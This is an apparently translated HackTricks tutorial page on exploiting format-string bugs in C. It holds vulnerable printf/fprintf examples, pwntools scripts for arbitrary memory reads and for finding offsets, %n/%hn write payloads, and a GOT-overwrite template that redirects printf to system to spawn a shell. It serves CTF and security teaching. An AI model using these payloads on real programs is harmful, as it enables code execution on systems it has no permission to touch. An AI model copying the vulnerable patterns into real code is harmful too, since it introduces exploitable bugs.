hacktricks/src/binary-exploitation/format-strings/README.md

# Format Strings

{{#include ../../banners/hacktricks-training.md}}


## 基本信息

在 C 中，**`printf`** 是一个可以用来 **打印** 字符串的函数。该函数期望的 **第一个参数** 是 **带格式的原始文本**。后续的 **参数** 是 **替代** 原始文本中 **格式化符** 的 **值**。

其他易受攻击的函数包括 **`sprintf()`** 和 **`fprintf()`**。

当 **攻击者的文本作为第一个参数** 被用作此函数时，就会出现漏洞。攻击者将能够构造一个 **特殊输入，利用** **printf 格式** 字符串的能力来读取和 **写入任何地址（可读/可写）** 中的 **任何数据**。这样就能够 **执行任意代码**。

#### 格式化符：
```bash
%08x —> 8 hex bytes
%d —> Entire
%u —> Unsigned
%s —> String
%p —> Pointer
%n —> Number of written bytes
%hn —> Occupies 2 bytes instead of 4
<n>$X —> Direct access, Example: ("%3$d", var1, var2, var3) —> Access to var3
```
**示例：**

- 漏洞示例：
```c
char buffer[30];
gets(buffer);  // Dangerous: takes user input without restrictions.
printf(buffer);  // If buffer contains "%x", it reads from the stack.
```
- 正常使用：
```c
int value = 1205;
printf("%x %x %x", value, value, value);  // Outputs: 4b5 4b5 4b5
```
- 缺失参数：
```c
printf("%x %x %x", value);  // Unexpected output: reads random values from the stack.
```
- fprintf 漏洞:
```c
#include <stdio.h>

int main(int argc, char *argv[]) {
char *user_input;
user_input = argv[1];
FILE *output_file = fopen("output.txt", "w");
fprintf(output_file, user_input); // The user input can include formatters!
fclose(output_file);
return 0;
}
```
### **访问指针**

格式 **`%<n>$x`**，其中 `n` 是一个数字，允许指示 printf 选择第 n 个参数（来自栈）。因此，如果您想使用 printf 读取栈中的第 4 个参数，可以这样做：
```c
printf("%x %x %x %x")
```
你可以从第一个参数读取到第四个参数。

或者你可以这样做：
```c
printf("%4$x")
```
并直接读取第四个。

注意，攻击者控制着 `printf` **参数，这基本上意味着** 他的输入将在调用 `printf` 时位于栈中，这意味着他可以在栈中写入特定的内存地址。

> [!CAUTION]
> 控制此输入的攻击者将能够 **在栈中添加任意地址并使 `printf` 访问它们**。下一节将解释如何利用这种行为。

## **任意读取**

可以使用格式化符 **`%n$s`** 使 **`printf`** 获取位于 **n 位置** 的 **地址**，并 **将其打印为字符串**（打印直到找到 0x00）。因此，如果二进制文件的基地址是 **`0x8048000`**，并且我们知道用户输入从栈的第四个位置开始，则可以使用以下方式打印二进制文件的开头：
```python
from pwn import *

p = process('./bin')

payload = b'%6$s' #4th param
payload += b'xxxx' #5th param (needed to fill 8bytes with the initial input)
payload += p32(0x8048000) #6th param

p.sendline(payload)
log.info(p.clean()) # b'\x7fELF\x01\x01\x01||||'
```
> [!CAUTION]
> 注意，您不能将地址 0x8048000 放在输入的开头，因为字符串将在该地址的末尾以 0x00 结束。

### 查找偏移量

要找到输入的偏移量，您可以发送 4 或 8 字节（`0x41414141`），后跟 **`%1$x`** 并 **增加** 值，直到检索到 `A`。

<details>

<summary>暴力破解 printf 偏移量</summary>
```python
# Code from https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak

from pwn import *

# Iterate over a range of integers
for i in range(10):
# Construct a payload that includes the current integer as offset
payload = f"AAAA%{i}$x".encode()

# Start a new process of the "chall" binary
p = process("./chall")

# Send the payload to the process
p.sendline(payload)

# Read and store the output of the process
output = p.clean()

# Check if the string "41414141" (hexadecimal representation of "AAAA") is in the output
if b"41414141" in output:
# If the string is found, log the success message and break out of the loop
log.success(f"User input is at offset : {i}")
break

# Close the process
p.close()
```
</details>

### 有多有用

任意读取可以用于：

- **从内存中转储** **二进制文件**
- **访问存储敏感信息的内存特定部分**（如 canaries、加密密钥或自定义密码，如在这个 [**CTF 挑战**](https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak#read-arbitrary-value) 中）

## **任意写入**

格式化器 **`%<num>$n`** **在** \<num> 参数指定的地址 **写入** **写入的字节数**。如果攻击者可以使用 printf 写入任意数量的字符，他将能够使 **`%<num>$n`** 在任意地址写入任意数字。

幸运的是，写入数字 9999 时，不需要在输入中添加 9999 个 "A"，为了做到这一点，可以使用格式化器 **`%.<num-write>%<num>$n`** 在 **`num` 位置指向的地址** 写入数字 **`<num-write>`**。
```bash
AAAA%.6000d%4\$n —> Write 6004 in the address indicated by the 4º param
AAAA.%500\$08x —> Param at offset 500
```
然而，请注意，通常为了写入一个地址，例如 `0x08049724`（这是一个很大的数字一次性写入），**使用的是 `$hn`** 而不是 `$n`。这允许**只写入 2 字节**。因此，这个操作需要进行两次，一次是针对地址的高 2B，另一次是针对低 2B。

因此，这个漏洞允许**在任何地址写入任何内容（任意写入）。**

在这个例子中，目标是**覆盖**一个**函数**在**GOT** 表中的**地址**，该函数将在稍后被调用。尽管这可能会滥用其他任意写入到执行的技术：

{{#ref}}
../arbitrary-write-2-exec/
{{#endref}}

我们将**覆盖**一个**函数**，该函数**接收**来自**用户**的**参数**并**指向**`system` **函数**。\
如前所述，写入地址通常需要 2 个步骤：您**首先写入 2 字节**的地址，然后写入另外 2 字节。为此使用**`$hn`**。

- **HOB** 是指地址的 2 个高字节
- **LOB** 是指地址的 2 个低字节

然后，由于格式字符串的工作原理，您需要**首先写入较小的** \[HOB, LOB]，然后写入另一个。

如果 HOB < LOB\
`[address+2][address]%.[HOB-8]x%[offset]\$hn%.[LOB-HOB]x%[offset+1]`

如果 HOB > LOB\
`[address+2][address]%.[LOB-8]x%[offset+1]\$hn%.[HOB-LOB]x%[offset]`

HOB LOB HOB_shellcode-8 NºParam_dir_HOB LOB_shell-HOB_shell NºParam_dir_LOB
```bash
python -c 'print "\x26\x97\x04\x08"+"\x24\x97\x04\x08"+ "%.49143x" + "%4$hn" + "%.15408x" + "%5$hn"'
```
### Pwntools 模板

您可以在以下位置找到用于准备此类漏洞的 **模板**：


{{#ref}}
format-strings-template.md
{{#endref}}

或者这个基本示例来自 [**这里**](https://ir0nstone.gitbook.io/notes/types/stack/got-overwrite/exploiting-a-got-overwrite)：
```python
from pwn import *

elf = context.binary = ELF('./got_overwrite-32')
libc = elf.libc
libc.address = 0xf7dc2000       # ASLR disabled

p = process()

payload = fmtstr_payload(5, {elf.got['printf'] : libc.sym['system']})
p.sendline(payload)

p.clean()

p.sendline('/bin/sh')

p.interactive()
```
## 格式字符串到缓冲区溢出

可以利用格式字符串漏洞的写入操作来**写入栈的地址**，并利用**缓冲区溢出**类型的漏洞。

## 其他示例与参考

- [https://ir0nstone.gitbook.io/notes/types/stack/format-string](https://ir0nstone.gitbook.io/notes/types/stack/format-string)
- [https://www.youtube.com/watch?v=t1LH9D5cuK4](https://www.youtube.com/watch?v=t1LH9D5cuK4)
- [https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak](https://www.ctfrecipes.com/pwn/stack-exploitation/format-string/data-leak)
- [https://guyinatuxedo.github.io/10-fmt_strings/pico18_echo/index.html](https://guyinatuxedo.github.io/10-fmt_strings/pico18_echo/index.html)
- 32位，无relro，无canary，nx，无pie，基本使用格式字符串从栈中泄露标志（无需更改执行流程）
- [https://guyinatuxedo.github.io/10-fmt_strings/backdoor17_bbpwn/index.html](https://guyinatuxedo.github.io/10-fmt_strings/backdoor17_bbpwn/index.html)
- 32位，relro，无canary，nx，无pie，格式字符串覆盖地址`fflush`与win函数（ret2win）
- [https://guyinatuxedo.github.io/10-fmt_strings/tw16_greeting/index.html](https://guyinatuxedo.github.io/10-fmt_strings/tw16_greeting/index.html)
- 32位，relro，无canary，nx，无pie，格式字符串在`.fini_array`中写入main内部的地址（使流程再循环一次）并将地址写入GOT表中的`system`，指向`strlen`。当流程返回到main时，`strlen`将以用户输入为参数执行，并指向`system`，将执行传递的命令。

{{#include ../../banners/hacktricks-training.md}}